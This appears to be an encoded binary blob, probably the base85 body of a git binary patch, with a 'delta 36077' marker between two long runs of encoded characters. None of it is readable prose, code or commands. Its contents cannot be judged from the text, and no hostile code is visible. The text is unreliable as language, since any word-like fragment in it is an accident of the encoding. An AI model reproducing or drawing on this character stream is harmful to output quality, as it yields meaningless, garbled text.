zHjj&Jy5{%o1e?o|#!P3I!taMa2e~rVx3cBgNAA9?yNKfByKi(CtGpKT#eB@ha~XF( z(L8D69r1#jc`l^1>J+>|#hb@vy!#dWznRnt4>1onzmksSovX_5Lq+#b<-V=l+1$FD zU9QUrsz1haWO*zUe}827u58(tEB7wSTfpf4J7norPQ9f6y%}wa}D%nc{== z%RJG)A5u1H=5jOMb1L57v%EI>fia}}oN}c+|A)f=2d$*a`98W=s`6e5@y1kJ?Nd^1 z_Kp3@zhAZaexTNrD^$6qUu0!(e>Sen|5laX7Zm(1#pAn3f@J#ls`&TY^1h$dQ~U>1 zIS;WaZp!tSe^r`aQM6xU-=y$26zy+er2CDcc}cl{RJ4DA(FVhRSMX|;rpe=ZTx4~` za#ct4-^DEWyezF-%Bf0YiGnZTA0-#R>4$L|cq9LImM?!G+Q*pLw>0IVjLxGv|Cho^ zIe@ee?`FJ=aSs!o6-@K2_Q2yD4|912Co@KRC9Cp8e-cL86HjD3#zZuoX<~JrlyS*u zGzHL5#uGC_>5OMfXe{Je)5Nr8tCq2{_!5&}xa#pb-6&m+MLYdGi592GDICX-F z)nQh?Ivfk7)5%a~nDHhinjmTuJe*AgXL?g4nu4b>VZbvpl4KluRr6pp&RqCxP7gD! zc__hVe>IO7nNT_zOGGnGkPkrPhyuK59%HTz96fCM{|3}#xt9{55eK9%$d(*45<;477K5e|7jbv3a>rUsrp#*Wa~?RZDoVt+OZK z8|ZE8^RdddaM(y@`i4_RD8gKAkqGcR4LQdUFzJcLGe#;D&R}uox5Xo=L^RTA04$lp zXVb;dAgp|&e-q^5^|y7gijAT0E>C-C1fntC&X%-$(wP)Q_e5puws;`kNHiYG7?HC< ze;nHV%%$3q)wYM?NE3$4GlmD+#t3H;sYwr;sW1^E2KjojlqzhatX7zzXguP{OeTSN zodRK%T0P;>RLY2FVmX!bj7KxWp3E>5GCT~_MvS@JrN_fgF@0GP9S)5do>1JA7|kR{ zGgw0-Gy*XaBO@WmmQ{c+iJUYbFw<)ce}zV48Ivn>z1h-IK@+2K~C-P1%s^CH!^5MB2bd}XbkEA{0d9n&oD8;OlYS8Y1?x4O=OIC8pLjOAQ6ffe<{X0 zSXDg9B~;3&{0$2iZb@JPZt`rcZ*r8JTppUTmgcHLDWpx&HWA zC>D(rk*ve*@zQen%KgI)01lpMvXm4kZz~*jfE)js5Q%wVYNCCV7eCz-O zdf?%NhaaF0bhiK<0`a*6Kt0{PeQZG>B>P}<7}yF@+}w`tM5dKBW>LeTe^g{Vlrown z*Bg66DewSK(yeS|X{u;AGnz8mL$TN(Fls8&;P7Y$lCww`lp<|q3$v&ZBN7cYw~a=k ziC!ZN+N+h#$s!Z!=FQ-b8L3t_+YSvR5=jIu&jQDy#&~mZG&K|o8=Dg`kj+M`B#WjX zYh`ssvD?6J&y{czxV#X!e<_t1O#-tgq3;uCfvdG8$m~oc%yv*piSf=*9Qs=-FOfx4 zkhZes07$%T5NaN=v~Y8wVs2%pO%*{Yw8q@7f@75E2fTWYyFm~D0@PaF{ngeYBZh6w$qf2+LKCzVKmEfYD(?~ zjntTtDrnMkrW+@>L8q)yk?5`L-BZTMr9EXTS{N64XzVyn2LZZ17+hM}rm3jRUY^cG zLdodBPCz9N_F&GYw z41`co52Q#_TPaN0FY{8sLJZ;1V@5x&6dW&sR(9qzqQ}4lv0_dq<8&sJ%2=hwa<`s* z^y75-sUlCW!s$#RX~mpUn}wy8HnsI}*ke+6B{CNp89!QHeXl+PAnFV6S3&vaqJJNfxv=G4`*9*O6{v6nC;ni z0<_u2q`Bchf3EgyWt&eri8yGPOgITr5(Sz5SEQ7t(deC~G#atWG^Jpulq`;fhhau` z9Mw?}NzSAPDCU&o2f=Fp2lnM_YM|Bm6m4tZ+OyZBDeqOK^k-5!@NkXwnk<3=k2-BnSX1TzX#--8b?V&LP*G9LawFNqLSs)UMjYW4g(@Jy* zR|1-SaWqV$@ty6su;0oWrlRRIGQ$Zd?2;lxe}1qaQYw-9BKS^YWKa=ci`5k&fmwE9 zJdG=IxT4=2O5);ba~nCW%%h;=ndVKYP;xjLPPdapkETL$QDZ?Nh1VF1h7Bxn0m>I2 zi>4Cs5wdOOSomHeoC(Euq8(9XgC+)1Ol;{yM?yP|X1PjYMEn>kg6}or5gWc%;-iUd zf5cuxnx9K7%w)!BOQk}S{&;dUBUfKq+0sIMH!b{|1PihRxU!TJcTNsUM#Cm3gqktt zWpTdl4&MZ>fe?#lX5k%VX)VYJmnblzVAj@wLTO8@E{7mD|AlrO2yafxi}H}UQRil{ z{%%`tHgLRXMmDh7CLS9S@=1**Vb++Ff2zf&?!k*ea7^AV&4bHyi$^R``koXFq9wp) zkFLss%_3Xr28~oS6pMZUU!~y6GQndY+07dhiI@?BLR8y;s_V|l2W@!wxvgw|KGd8v zEz3s~Y3I2%8XLIL2KL8d#?DZzEwytL`=gDjzK|*i>cX&**sF%^wA0pfS)gh>e_OOF z8$~CX{q{Ir3963Q7?RaVr4p%pir{E?xFc%B?5Qp;ppZ&aB~V`qUA)F!qo_1H5~-1p zohdao5-DG~Tu>{exvkkd8jlys0zfm-5hL5F>_A(Nc1Z~iCsLW*LImmUYF543U{cNH zQBS5b#z-#ATw$G?3rmd4BCoW8e{Cx`-AO|#{}OVQGKONnon~CcO{b%fl*z88MW|pn zNoP`{VVZy}C_+GuomE^pD0663`UK3rX0_gKE7}4JX|Dd8Yq~{Ha&b9woD2UfcCOA$nm(F?MX7%7Y& zHd4@C;Sn98jShwNA&Lvux15zjb!r|}I%$NV6?P^dG(3`h8fqZ;x!UzS;(ZfgE3#FU$eqpwXAuWyGT&u#Fpp+-6ACTxWw_ z97;8}Wgym|TqRhNe}~%=%C#M9^YERacyx%wTaE}x`C1aDTxh*_T9YtSMdcC%hYjrL zMNt{D_#29%urM&JkB6lCk*ze*Oxvsy&F#_Tuw}&Lfpe-;UyLHxqHM?|AsO|LlB8CV(7XmsVt==q)XdMvpzH58S(=9++m*66f1AD-LCWld77{1NxVsK> z?o@t!VUtTGw?WC2av5QA6Nig*8oEOworwbzwt=BM6t%2b8$~9QOy`X`b$K+wU?98w zr3fx)C=HpPJK|_i>p2PBb@}*ViYDZ z3=AMHD9Tp$f3D+D^ct6pQg>Q$TtYL`cbk;7Xps)#o4ttKqk|JeY5g|Jm)grugw_)0 zVq}Wsl+q+cdsq=V(~ezIlmyMVKs0XH*q(z&T%(^>;_6Bg*qS5<*BPBKQY!Ys(iB!F z%0>2tQag=|Rl>S}ZRIIv!zT_EHk{hEkrzWj&6S#ke?@Rv0rC_<=F0IrJ4J7&-?Rhg z=fSgOsSTh71(5bo61R^@!xZ0n&nt>SeXHQTMlu$f4ALSEj%*5S0u}{uP0ePX^~Yi8 zPlNCdt;Kql#9}>7WF{4gr*Xd0?A_Fk@2v-dnbARe;ueK39!Vym@r*rj3mb@zN!zfY z2r?5+e>V5E_gE=to!<3qL07^fmkM!%X@r);JAQcwRQT~?4Gvv zt-e0F1+mw6e!nl+$L8b$gFW3{K_7GXwDoNs2>N=Mr>D0Yw|NfuF7UPY_xT1o0&Sbj zt-t;qJ}+AY3Lhr+wmq`;9h_A?F#pbhRH(-Ff2>~ZVGD|giMe;W*Vn!cp8k#w#)Hfe z+}yT$4LZI+fQev`X`p8zoD7Y}*(@58t(}N$CT_O$UC`(23i_c+tOmoKzP>hD(~aHT z0X8=m*4~Z#mM>tngXT)nU|S&2-QLy*m7*|Pn2Qx>jLa%6RM&;F zW->&3xV>$CZESu%u)miwmW-2pwC7fx3*PFxkj=0_$nkmEV0KG+pbcWqEr3%278V67 zzRxZ|`n|Rao4}s7USC%qpbGOK{>`z#fBv4$zFyf^>hhtG48Z$*y+L~=Ks2CFs5rGY zIHcd+2mJ|J)EBfdvc1VcOQHA6v%-d z-)U>Tfxy7V{*De`?}^a{d|jLRHXo1n^mQkmuB27zHcUl(et%oQ-*=&nS6)A8e}KO3 z-U|m%8`;-ne+QbffHTxVYAoOd?Y^7H?J-p_<<6o10OS zS=r%k`}|`0AqKJ1#zTK++a{?B3xHT+o3vO!S+zNNn0$pNp;QE`hW;+le^Y+@PyxNb z*W1z7jy^98Y!w!!$6ofH)1f1F=QOpy2gV9thyMZ_47d=4F`%=@)++!e%VDukb#_ZQ z1OAP@ZDudFDuKgTfS6eTq_YSX6FS@4i;OV{&Fco8zD`sZ!9F~CG$$WS(mcxs?c3b# zwUhZbVHd#)6oK|Y*SE&Zf6l&s8|%A#eKhRP&xe@8RcA+R@9y1dwT*2!F>%n^efE|$ z4LGYQdVDbG5bN?_#JSlv7+So+-0>c3VhML1uY0<;Lo%}W%*}&>ItxNdR%OUG1gpR@ z0p=IMTDC`%xFeVhD29FOJ|fMj+>;H0(c3gO$@0{y;$)7IMZR2Dl9L9=YYV1J;`UWjfO zOHp50O&avI^|o&w*c9mAXycHA!dTPa8}t=JV9LS5bTEe;sBi0l8mp>vp*`Kfe8TOU zeR%lFV!Zt*ls!Ile_=E+Y*j7L)4~3Y&|_>|l>n2_%DE3j4d8ig+qW5qXH#@)^5Hoa zqk>5>u=);}=2p!9pxM$^tI38W6C)p3l#-N`mGO4p#`d;Osqk$By9u@wyj_tgETum` zA8OiJdS7q951yEx*54ao3;N@`;)(G%9g8*68S5k;o6{dpe;J|hFfK4>*PPfq+uJ%1 z=o!y2y{KmM?Qq;d=^05x@JL*Z9ifiNahT$5TQjhho~O}s9X;36^K>S*buj0)4!?iL z4)FV#w$1McfS-={>D%x;8-QRUxQ!0@fgkC%zz+ifq`^aR4t&Z$fC2$bB|t|5fh>TS z0FebGSzrr2e~CEj>>$_<3P5?B9>;Ty{)^IdJ71Qy*cGwY)4HUhcNqvoQ*tpc;{u^Dcak+f}$>Z_>w8329$6YJXO_(D*30^Enz7N+jEy$U*oY@Z8VgU{u+vW>rjZz8ttS!BJbA;;IEl!3`sSn}(gE|6VGy0d zVQZ%mQ=PS!8Iz+?H zIqBHcJ{zYWJ^wJw$<&gOR*b6ymoT0Df4Vr0{Nt!ZK^^t-o%7~e&(-(<=m4^LzyY(O)Gve1Lf=!PNC2=X+4>^f2L7#;$5Pc zIdbC6FKvjNIP;5}ASWQ3#f%S^x+#Rs4CmY;g$Nq$Sq0vE7K+BxTa8H>z{QNoq(LOO z6%_1;!XdS)V9165iy3MaYHVaIiW zrc(+4h^CXsZS16mgYw{X63cyr&K_(u`CJ;-pgYgbCBJ4=|V66J{!px|0MF!dnT` z=q4!)ng%US*O1%?%p5~_%81RzVdm^6T!@5Hj!ZV;%BY)w&CSh7g^QeJc*A6e<@LwC zpvfIWvC;G}(}zYfe;!CUk?IPK7?2ZfeI)>HJZI%Yqp_GOwFZ5U&4NeUU^)?l@=_bx z0k}tx)gXYDsf~y~ogT$qbmcpKSF5mfbMti8YlhE8GN`0J2KcM|}lrN~}k@ z$UnuGX7em)PYRUmgiT($jBzFUY3lCs3~Kj~?0RWdTL@FdL$2lw9av@Cc3Tw$mXhST zD5#o+n29`52Z$!kKqe7R#3;}k8kbE^0V7RE*+?sxfwr{D82PCVu~M$`olq~n#zIsu z40-q^e?R3QCSQEYK0s%Bs9?x?H5OH6z3RLM@k*{1$Wjpnoe01;8IT$Yf!t}2LPza_ z>7#O>V~5mwmMWAzha}2~k3m6Gp+Q+X(9WqOn>kEJ8_nx7nM;Nt8Rbc{S;Np6FfjS# z2nH-y05!-%lyn#BBj>OY-8qb|?BWhQo&kdre>rC}5p9GYjLmolH4H1pME4NW@uq0z zj+)&Pe5&-$XnYJZVCB)YIa;uaXgYhvFmpuHzU~g7OG}*-O>d4yB2Y0mR+***I*<1@Ek1LZJU^6Z7wgfOuhC#hGf%r~Ls`6qOZJ~MgkZt`)Ru|8uH7WT~J@U+)U>YfbAH%35bv%a2TrdEHhasg} zn;D*SyoA-*Fy?~Ul0sO{de$5pK6^fd&9p)Ba&%iN&Bg98x0T5}hoUfzg_t5o4;I>} ztkWn8S#2Rlj1hdj%qnd252lUm#0T)mAt&EXa)5{NcJq~~j)&8jD-QZNgfH~te>TO8 zf$aFG$FWP7;Zqt;73ftu027#?;gbkR5r7v5=NOJ4&Uhjd9hyWCy0~>fkEe0aPQ=x9 z%zYt@qtirWCO&OqTaIB<>n6;d8foT8kcM+5(oM8bfF7z(Ie1KA)?k**Didl80-iW! z&LrJL%-rCnQP(jYd|<`n6YKS~BX!OyHE%p8hgeUdNvX#8yEe}pG44U5zu z(^7+j0LH0a1wNJO%*rs(0ZC3W7kV)zH)$j6#6*hYVQkEh`2M~Q^n?xEBI1^lT zb@qqsLl`)>>*5v`JbG+bdySmxxD{7W9lj*Ype;o)`|b zDNhEIr>nFHiL9_TAI)Hv!@i-MsBm3sxb&Gi5lZ-0)IfMXYC|R zF8?qo)(gxPoN8kibET!#!32n)JB{~u4B#-FT^g8S`e+bkGtHnXk)B3P;Yh~}Bgvd{ znF@etvN@ncQ7m(|`=I%?=4t^&_3zQ$WO#R~4bN`K?byKLoGCTvBJ3%Qj!%d|6c7h!GGQp;BrETGOVwmdpB zZ}D?x-qNP$xC@tyrd*a>a-2oS+LB9(3ra5-)=jY-=sE6U-|FL0Gin2IKgtlAP94RR)&M29P=y2La|13 zY1BdAx?pZ{Izvh3A|FgJoMWgBVOYy*@9_|>@!=CwBo7u=jKlCa4#VT@VhgyQDJ~C} z(o>axw>Mi{>b7qgp~7~XH>)jjwYMazv|pdi78JWoJ2yR&(|_6`H)l&S$9Ob?Ymejf z83s0E-2OQRUTtijvq&XMw?U~CXepI^Xmp5)7Wl1U&VNtS@!J;t9@l>NN1O-Tu9^E*Z(ysK zYbHB`f70oiIe)QLW503LJ~>hR-&TCUED|HQ@llD7S=#@)?sY!^sqwmMt>QZOP5hUd zxWSR!s=1zYeVVTp^B0RtX2niXnzie!|8B4${gja3QMstTZ$c; z`#MKzsm8zHF5jnB-r>})(8_OgXsb2nVW+m*!-a!i;p98CikqCHOo`*!Tucg4iMefuVMOl&x3!#R(zWgN3vE?+wf`4a-hs(ZN2A=t5F;-1#{F81?G;R^^U%Wc1u|00*j*CR~?Mrqn-FlUnSS6WP zlPz{s7yBI_<^SYMH2pJ<8^Lis==?lis%f8gX#0S3t~>azqq^f(B3d1A=&SGG)w4AB z_nmj}C^GYAs3SnOYR(6o+J;+28X2Y7<|z-Su@q}Z2eBx*PM5k9dNm3_K6QHe(#Qnes&ta6N2wu$o%AC?-mScS2Ne*3C;DE z8#DcC?t9AS9Ks6E-oWM}+2S0gIJ9h4AJMei9Cz^5e9r9E8vCeY?p96z zh=0?uPjh_ERUuYg4!jau7CRUe*df-9JDF2=I#?NTJj=MPJ9eDQ#1Ox+Y!R=$%Jh6t z41%Y2o`{Hl=(_%rYyN;RBx^0QlFvE z)Mx2cWnRYI_-*9f`0(K4Jb27{PG^A8;m6@8KJ5LWOL(7#-!m>q!g~~azty<6lDWO7 zGvQswbTEn7dET`UI0JsCLA=*EkNkxLuuA9N=N!WO!!qHmgG3*y;PBJE-vsv?6@S8e z1l&i!Jq*A5fc7ZRJpsS}oF%;fHB0y22JW5k`z-uE2fsVucRT!UoyEO(!|w~=KLEeG zW{HS~rC7yr7U1 z6S$k<2a4PK4~K{x(b;ZqIS}lHLfr~Q_&8K#98x|45x)(;3Lvb3;=QKn-dCZrf7S%o zxlQetV{RScL@#s_26&l5(52=U0g`KaCi^u(2|hM4|I3rhdLDSsLr`A zBbf=5Im;K;@jBsNEJO{r|9^>&OLyxp-^@8U*M5o%_rd*~i`VvZmw5ITu3xs>z5DZg z^QF7pNACblwdV_*^W6vFaT7jX#K-k_!sG5cxd5W)?gIbq{|S%%{{?Ns1*=&A314{+ zU&s&L1K^|ga0UYhX1xRu2fxUd@?&4*%*{dNazRC!gT>;)1Ndhj;D7ay?A-?;%C!%2 zzGt`lz=K#;_rWibbJHPmUi>mS4?hHSFF(YY#+?AiM)=FYab`Z)roe<^uEVIGM{-I+Vhpi@w2b`yUKa_HbCtCKG#3G z+kN}@`F4Kz2N3NTK3@C*B(?hqV)07I^u0iN{S*9s{JAHnl7FYx{2!>~-lJ5>14sG$ z`Qf8Ltcg`n$q-7wQ&6;H_;~p#9^reALH+JNMg?lB83KYM$M{bE$}w#Ar+JyC&1}xr z*!(*a+fhV;`0l4ktX_GV&nmy~Cwv!w@mYwt_h-oUpJOB7;}|~Pq~I^$@m+kph>t6u zgU11UT=`3Q9Dl;c%fICKQTEn?O#grSgCU%MA3Y!EAY>2_Uqd#(`78c)XqM+eSYCJ@ zzXZxZfP(S@|2O^i7byHe2tWJ+{}4Y$VYXXf-~0`C0`4JRXZ`&R@NY=sBV1gD`R{)TTFP_qC4at$^T%HTY32M|i2n#8UwfHf z4o&}iOiud_BzFZScl3|^N@&zSV%K~H#o!eZ-R}Y({$GV8*Zzs`<@~-saSdWVN;#H& z3{$-QRem*e;a90<*C6Ej*Eoz7cf*hf#e0G;ILgI!9J<{L00FVz^B0if7p@aGK&%@C z=JP{TH-Gy`L~jr`Lf6|TTmXNHyX}8B5p(wm?!Nv;0gCe2jo1MEQwZLDvjBB@)6E3= zG(sM~S=_?;3lj1fgxvQjaVym6Qv|t<3c6o>77DtbAfH3X-cO6$p#yxHAfHFb>z@{P zK#6W4$QKau!Yu;S?VAJ)QrU)kN5)N{8&{a%Mh z*`eFSy_~;t8)bYSWpkIfAF{cNAYVkt!F$95(8%`?dkJ}ABd)jmj&hp8M73eeH7KS+>oP|9Bt-{kt^Un0mOBxr{O zsDI&uhY0d5igieUYJFWozC&exNPL&;&pt$u?@{g#iAN##uLuV)>NQK&A4B9b4+|k) zd06oB7r!n*-5&i0MSOw;?GXVA^WjGb@WfT5`5)pD&p@EeC3bCAGm(&j|lQdD$kDv^v{DoCV$AE zhzCCwuL8?|EHtKxH-V9EUjAq7Z3q5GP^rOjKl4B0uh2by0_i{VEX94DI@7b_?_9tB zX9W2NLLUB^cmsMCLD-wb(dVi3|3v?R=b?2DKQG>bvi@42B6wT2-KD6&p8d7BOz_u! zO;(xF6K9q%Wdqzkevcr1L|+mC}gdV=sv>>-^=H1k)Y-TGJ}}3Zf4D zo~m#JoU)hkapfO`DBt}@@pYXa`6HH#y?}JLzJmSb6)}TVup5M>Kl8fS|LVY&TVJI# zZ~8Md#C`Cnc^w|^EB^+;@8V<6Kj3lnADH7C;CuX|8ZSR|l}7xgGVRq~)qnZny$BJ1 zM#yV>wbyig@5f*Qe)MAi7W!Wiy!UENFT4F}?Qc5Ydkx@j#mB*Gz`A<;8jAcTG36TV zpE`dXakpPfxx9_wgV$-h9sJmJ1i91!`uCOVw96d)%1>Yh>^~eROP|nq*_#sZ5d<9A z2Y|!-2yg`g9{wZ%j(t+AW`FXZ{oC?i(-}*u?@Yf70K>E8H>UrF-?*-o-?@evJG-et zehd6sAUv>&(RbV53%?a@Kwrh!9Pl3qF#H%beKR}O2{hpE0r;`+0~}~RfpLBWd3j{M zcl{LNdgS-)PxW!8d*rv>*=Eih;I9PlQ{ZRd-vNGOEBLEqxu5Ol>>>XFP)i30Ld^Xf z<&6LUtX2U4P)h*<6aW+e2nYxODwb-KxHDwb-KDUxmjDwb-Knv!P@Dwb+QLd^Xf U<&6LUtX7i`lP?BglmGw#05YaEmH+?% delta 36077 zcmX7tbyyVLY)W z|C)21nQKnn_vb!yW}+OezXXjyLm3@|3?9J0^hG<)0A6D+u81kvm?C(fcMvJHIwpyE~ zEvsry@~5Sr_{Cj!H>B!-1jHoGUbS~P&=j%-G?k9tUCywYW{ETze-a`d70vhjvgvw@ zBj+npw4BLNa5xUZ_Vl+Z(5=xUdud`xOyI2U#lM8SWE6vc5OfG@8g0kO3ae{e61HlePLH5X)2Ptl%i@pL0qJJ8vp+gl5)#RmmfnC_6@5V0z z5U614z$M&pn_qCEybCqzv4WGIaNm&J4=eVN;>Agt2R&Q-lt{xohw$FvYv8 z^BxprO}g34*+pna(3`?xJq|St5R^`ou8<1nK`RZsyHL{ZkLFnVC@$!}VSzpTCvWu$ zb;EXgXljU^FvX?m2XE7Va8cp1cmFg8NPeK5ck94uYF;j(xnN(1Si^~H=p-;7(M_=& zd&JF2Z*UGUC)70_&DqnjQ$xPN9mnsr3czp`H>n%Eh$d13G|wJSxbpaoz>+{ZdJgJp z$UVKRWRE@kQ%&w+E~&{2Q`&(=sj}gm^T#lcX-!?Raj#{*s=6R z^{02;nl-d3M{mT?B~W}q!d%^?;DjfH8mlDq=r&=-=JSP0bL;rKnH z=FD?w!C3ZE8yP5)-5R{)BiPD7&oEr8hVs9Mu;%9)Tw~ND4E4~aZWvteOD*;;T6VXF z20;}XG?W0Y3`c(Z!6rhHg~pBH8?M)Fb3(5X7()~K*ZdU~_FvQ|4BxQQ?$Yja+C2^g zfg0*g_<*^nJ~kK~TjoE|9-0WM3btOzbCn+{gn%$?{8&+(3QrAN4+zKZ7ONo@0bU*E zk!gpV_i#P0KW5DplT^5Xel8w=42wYODL&fa7Ml%oF0a~v0VftB1N2dAi^YsXkYZ<7&G zoj~EmU&1uST~532(E*+1R6k&Yp1 z=DZ^0SpX_Gs&coMx#SJT{fqYb*zci?8hD?>hv1rSwEDO!sAi#J<8QDp@m`=jq1ZlK z+~iq9IGtEXX&dQJWM0oE_ImCbssxTH8g0*xInl`u<6)jS6(LJ_T@S>K)sLhd6^x24 z%^Tg0N-v`~jvkL`8^Y0T0{?g-=ttQ8Vg&_o4ZnVd1=|hX0ftmqhq+YE8QHBg%OL9O zmsrH(gmeUA;YWGzsBk`q;_(uyU`$C1iC|}8|9{;4g9o@VHDf}s-$vZwC!%%q;F@DK zzg&8egJ#q%GtLQ`#oFj$hU4*qI8oxdE8)R4XzeH~7_|RuZVodTQ4|B*NpfWOfo;KqIz9@WEs zg7pK_EG+!hHO>;c2-XD_diO^-D33%1-Lsn(i9!}Y_4-YzdJ%`$fEfpda zGR5GGYKMy_gFQ}tfzj7Z<%XC3qO4mK?%+n+OwWnV(anCs=!fovve<14w>1a-{K5AY zgInJ~i>$rB1DkhGDT;9Jaxp0{r7>A2jOvti=EGbs#eD4bBmyBXkKvJ!a&A~asu zLEUb=G+9`GQ7FS5dq&}EZc=_Y5?Hz+wml9fEOQu*q1kXfHxv=(*k3ZF<0NFE;5<4N zEXokto)2)*8sY;KDfGPvw>%~U=I1b6bG+x2LZuAn=s|NsZzjFRmmoAnaSb;-!M&mR z@fWb$k*4Iuh)1Uk8Gwsw;CG@UyK}qu!uZi!@T z96l!$+Ov1CKw*b)+7kg0oC7O2g7Fu!GA~lXUYoxVq0Yi837vj^kPox}18NAEU@ z1)~UJa>JVO(&I8jxSxYr=5~I()2f3v4b6|ng9=~!G)j*hjZmoKyVtv zpxwgH)W?9}HHMFM6P}3Pph0jupIMOotP-vaA=q&b_p|#^f-$5*&AJ&*IOgz!(Sh_k z(vs^4HVKPZwR9iSl9`BI0gG6bbVAaS_6RmEi&mv{8;u6OvCDh&5&l#gA0-dktDIC~-f?cDTf@ zfh_bDsD2ZFc8OS{vG9|pN+kYl9`PEWw3w5nT6p=HA;JPZe;;~?bFPDlTXzVi(BNI1=3Dg0e5t8QF#P7&O!7r#SK z;bbR7&m2Kv2~%>TNylIbXUj_&S(QA_^ihb(UIZzRSoMzttGzrA=Y^7=d!(zAou40P z3V8{4ZF{W3`Da`2oqRL80N>kr?DLPOf=>L-`CPjhoHkNRr7~jce{FKp{VS#LBl^`F zht)gN9i=^OlKGmx)z{`~89%CfXRtQ+{%UE6s3a3WW~`kFd|1z7-ewvY<4nsnsM^oj zXq{={KBr5&l}Ni~)RUn6C}A7ZQfItxc`A^s0_xe)XWG8;u6Dm|0p#zq*tUZ`piV2V zu6wuhGrw-*rQIr~Jux4%j&2MDg&Mze$*CV&dY5Ud^u5}1d4rKJmwQ_@Q$>vOquAK< z;J(@jk9~9G^4NM})LWR70B!I7ch?z7vO`dH-y(DL&Ly!l1KH0^GFDl2(*kW*SZaYn zG>*1h^r)8)W22D6z}C9$&*3qCy(}kF=3oY|TZ?mtkLP_=f_45}OJgikFqbbE5{K;j zddB|9R*t{3Cc!h&NGCqmWWTv~t;zF5jvRt2Kd{?C-RRciPYx;H=6lH6S>FR3>cMq{ zf9=fgZ2DbLWp-c`lZ$~8iM-Elg`EqftWh`@0&fP6@a6P5?at}Sa#;v!-NUsIP$j8w1=9sz9 zCArVTxz9cHvW89Et2}NE4$talyekQKuSw2@)1j2-l)Oab=TKfE(sNWj{ip5!vQ*8F z=*Mi+kV%<9vOVI!<9N;ExJi_HXMA)>Fbn70oKHQ>KRUhK#DXWn-&}&oLR$M@D?%fsxDzuLRlGkiFE-+%SFdTFOCSJ3kTx^sSA<#_0xLDaouHbRJ1 zgud<_s60v3WPd6sxcap{Z7y}QA=YGjl51!`wFg*I7zsB%BIkZu`kNBt-@e~EWgJ}A z^k&#HaX2VvxV@YFiX{z6&wZ{o+rjDG!sDBv*RpPK=wY_c?;7GSE0Jq*gf#Z=3{pPp z^ou91E*CfP|7EK@nazrRx_@V4*d zUB_*$qV+Ndp6Y?2p25Are!iSv}*}@3~^Gj2+Fl+8RM0g zh$QS9Ty@`Wp}>jSla z>0q1e3fCDp>4~I8d-H)YEe0aJ84fUlNN#He6=cEeXM9P}ILP}=k0cIRFx%NGV=l>U z{opsoT;dj`O+XgRaVDBH76*~pjAJw-X))X!W;7$dEgPJb?d0}I7v(|pD`sZ$_8_uktXHF0!!Ry0!iYs z!Q5x~NoKM4N}IEczOnc6n@x;eq_-V|CXBvu_cEJMMu6nDZqQ8ji1@aAu!9jGZBgGm zW_)_tVz!Bz1jI_b{iXKiX-qSwUUq?zK8Yd8Gzpw!&p0J#6Fow4tTE#4&)9zFYwr$CRB$*jpQIwOC^ z(Z1L9t2_Fz6}>6#W6mEg)9X=<_Q(D+kRf-$N5&m?CZ5?d#tv8ST;r&%az-=K+txuL z#@Se7+fzdW?jV=CEERvk;X1@y*j!)?UFjC57&(7}nnJcUu$wR7lxnc~?}$ZWm_LbC zrbG)%sMa6i-9nfaL#!m_Of>$AtE=Rnp;}2!z>;_4)lO7LB!j}}#1-e<>etg*+<>f0 zMw9BTfL4WJE;0IpW053Q$6J1ra+pQ3x5PYE>BYZ|8lGKFuH!=E%BQr!Vn$XiQc1PU z%05gDu>5x~U~BSrAt!DU`~kYUlF!biD(1HF12s4@WDV(dRUX@hc$nUPu|ab_<-kbJuC#)WSmky-*d+jU<63X9Xw0`6`9aO55pXVzzZe7Ap^ z_fd~2p7i)ve7n(b_Ot<%G;L~rVUYAX4W=H#kG87Fv4UxHsR89#IJ zLNXDex8tkd8_C?2xfWv$jP`d>6XbJTG>;dRi<+=_i2c*&9D8YyU6Wh5wWwXzH}4gj zYJ_+XaJ5b87+$>;O?~{imE_fsst~iJqID^9!ESOiYTud4#Z1rjDJQMZjH9-xmz1Km zMT-9_dah7VZ?W)#=CGy(#D9mjpd{ek_1`^tY+(MJQQWgT7Na{7<`!d}STAd`5sMQf z4n@leVEJpi>-4#}ezTFle(xXva7GP(oWKdW~TWRJdVS1b5{{wmmAtQk61CmHO-*hFAe|AbE-;w=nqoteSGWv zzV&k~QlplL6v=z~&iJ5j0Q^2DoOm4ozuy~+j_9mQ-74TwAh19x)jb1- zJ!p2}UTw4)`cbh^O6Gtyk9E_>vVBfn27iv=4# zr#~LRVmi_W9o(h#4m{u7n*fZ*6#mtN$oi2ITUl`VR@y~-syG7kwCU3(QnaX*$C5!E9FGBFvfN9Mp-@>tJ1Xz<5TLWU@<=d3~C` zZ>CP<(DG7UtP~*bs5*?}<>C8^P>b7=$6MrFEwpK@eK+eNKwrKkoFu$lR?Nh2QdGQu z&UoQ+VfN`212 zxC5qN)q|SfcTXe^)V`PR*v@a(8C(^e%W>EEt0%`Cv$QI|*(>e)^|@6{ezk8cNL?{^ z)Pw(_WQ&V&)Y~N$(uujYD00uxoLmKMvfP~fG%QHtdL9V3Y@OQf(B!dy@-@GA-F&rI zu*~)S)tN-*DnPDh|B!ulzx0u4-@iNi1Spt+JxIzLBqk9@U7N49G~Q;P+0Y*^Bly}J z4V1_kVRoX?Ec5Mp!^TexVhJ|$?Y8A9pB)TjSnZz)mR~HVC2PiYN0Yg#m$|cTW>*_e z_g;WAm1SAky1kj~+=6N2Xd9fW^k5TMoJyfOGdXkG`GQ)1!JkBdXqb@QqWXAqBZ={JK#Y^JtY|zUsgUu7Lkd``wJdqU4 zvL%Ci#^X(pGwrol=5=)j#E*{2lduboY2?dj;GD`0FhyzzPB=l$++t-^m=fXAn=&9g zb`}60^?D+AKx30y3y)dNQc+jF<)g@@_y=plkIQtatP`A3s~gp&a>Bz`7fGYY)%dPi zUJtNc-GTJ$sMY;KvwDNZQX=QzDA#RC$CG>7Th!6XGer~VtoeUuJd1Op_cZa-MvnHs zF&z>3-`7u8TCeS(1C!HF4IazhUlYC0=&FFe!GD8}7a|aP`2%{o)OQnpQPL}+;sRWC zN%#o6%&qrHHsCf~A(yXxMpVD|?@mwyP8OY3Jew7x7Q-l_tSjTEz$rcujsX5tkcI3I zr&QK){mg59mBL2CVYcbNYY#EWY_m50cmxw?gkqX)QiaIVF^!D{$6Jut!deGa>7Lg? z9LH~<0n#^mS@5tqZBp^G9BB9ZM{k!8i_&04m5~}@CM|jwES0(dW=)2D) zs{zrS+(Nh+-}`L4y8F-Di|wnYq8)?{dNawv$@>rTxl?FSv*jZ_7Zvl*eQ;nv^52D5WK`!v}7PpH&sbkdT4z5I?#+@DB&60h^-i2iu*^_#NpGFu-M z#hb*K#4Kx$Ikr{i6hRgT#T)44GM!h5?p!Oc%g7DyQtWg6pE3(JbE?Je4+E1CVUMw$ zyM?^?e0MkC7Bz`?f%sd4nE*%3>`we6i{6d>cqswzT?N*9E_#sXgzdXLGs1@#6Fbpu 